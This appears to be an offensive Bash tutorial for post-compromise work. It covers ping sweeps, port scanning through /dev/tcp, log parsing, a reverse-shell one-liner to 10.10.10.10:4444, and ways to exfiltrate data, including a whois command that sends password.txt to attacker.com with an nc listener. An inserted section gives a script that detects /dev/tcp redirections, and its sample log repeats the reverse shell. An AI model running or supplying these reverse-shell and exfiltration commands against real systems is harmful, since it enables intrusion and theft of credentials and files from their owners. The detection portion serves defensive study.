If you can't script, you are a "Script Kiddie". Dependency on GUI tools makes you slow. When you land a shell on a minimal Linux server, `git` might not be installed. `python` might strictly be v2. But Bash is always there.

The Philosophy of Pipes

Linux tools do one thing well. We chain them with `|`.
grep (Filter) -> awk (Extract) -> sort (Order) -> uniq (Deduplicate)

1. Reconnaissance Loops

Don't ping manually. Use a `for` loop.

```bash
# Ping Sweep the Subnet
for i in {1..254}; do
    ping -c 1 -W 1 192.168.1.$i >/dev/null && echo "192.168.1.$i is UP" &
done; wait
```

2. Port Scanning without Nmap

You land on a server. You are not root. `nmap` is not installed. How do you scan the internal network?
Use Bash's `/dev/tcp` pseudo-device.

```bash
# Scan ports 1-1024 on localhost
for port in {1..1024}; do
    (echo > /dev/tcp/127.0.0.1/$port) >/dev/null 2>&1 && echo "Port $port is OPEN"
done
```

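This works because Bash itself treats a redirection to `/dev/tcp/HOST/PORT` as a request to open a TCP socket; no such file exists on disk. If the connection succeeds, the port is open. It is a Bash feature, so it does not work in `sh` or `dash`, and it needs a Bash built with network redirections enabled.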

3. Log Analysis (AWK & SED)

You just downloaded a 5GB Apache log. You need to find the top 10 IP addresses.

```bash
# Column 1 is usually the IP
cat access.log | awk '{print $1}' | sort | uniq -c | sort -nr | head -n 10
```

SED (Stream Editor): Quick find/replace directly in the stream.

```bash
# Extract all emails from a file
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" data.txt
```

4. The Reverse Shell

The most important line of Bash you will ever learn.

```bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
```

Explanation:
`bash -i`: Interactive mode.
`>& /dev/tcp/...`: Redirect STDOUT and STDERR (Output) to the socket.
`0>&1`: Redirect STDIN (Input) from the socket by duplicating STDOUT, which already points at it.
Result: The attacker sends commands into the socket; Bash runs them; output goes back to the socket.
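
Seen from the defending side, the `/dev/tcp/HOST/PORT` redirections used in sections 2 and 4 are a distinctive string to hunt for in shell history or recorded `bash -c` command lines. The following is an added example, not code from the original page; the `uid=`/`cmd=` record format, the helper names and the sample records are constructed for illustration.

```bash
#!/bin/sh
# Added example (hypothetical helper names). Flags /dev/tcp and /dev/udp
# redirections in command-line records such as shell history or audited
# `bash -c` arguments. The uid=/cmd= record format is an assumption.

# Constructed sample records, embedded so the script runs offline.
sample_log() {
cat <<'EOF'
2024-05-01T10:00:01 uid=33 cmd=bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
2024-05-01T10:00:05 uid=1000 cmd=ls -la /dev/
2024-05-01T10:01:12 uid=33 cmd=bash -c '(echo > /dev/tcp/127.0.0.1/22) >/dev/null 2>&1'
2024-05-01T10:02:30 uid=1000 cmd=grep tcp /etc/services
2024-05-01T10:03:44 uid=0 cmd=sh -c 'exec 3<>/dev/tcp/192.168.1.5/8080'
EOF
}

# Reads records on stdin; prints "uid proto host port kind" for each hit.
devtcp_hits() {
  awk '
    match($0, "/dev/(tcp|udp)/[^/ ]+/[0-9]+") {
      # Split "/dev/tcp/HOST/PORT": p[3]=proto, p[4]=host, p[5]=port
      split(substr($0, RSTART, RLENGTH), p, "/")
      kind = "connect"
      # Interactive shell with stdin duplicated from the socket:
      # the shape described in section 4, so rank it higher.
      if ($0 ~ /(ba)?sh +-i/ && $0 ~ /0[<>]&1/) kind = "interactive-shell"
      uid = "?"
      for (i = 1; i <= NF; i++) if ($i ~ /^uid=/) uid = substr($i, 5)
      print uid, p[3], p[4], p[5], kind
    }'
}

sample_log | devtcp_hits
```

Redirections typed at an interactive prompt never appear in process arguments, so a string match like this only sees history files and commands passed via `-c`.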

5. Data Exfiltration

How to steal a file without `scp` or `ftp`?

5.1. Base64 via Clipboard

```bash
# On victim
cat secret.zip | base64 -w 0
# Copy the massive text blob.

# On attacker
echo "Blob..." | base64 -d > secret.zip
```

5.2. Whois (Weird Trick)

If outbound port 43 (Whois) is allowed through the firewall:

```bash
# On victim
whois -h attacker.com -p 43 `cat password.txt`

# On attacker
nc -lvnp 43
```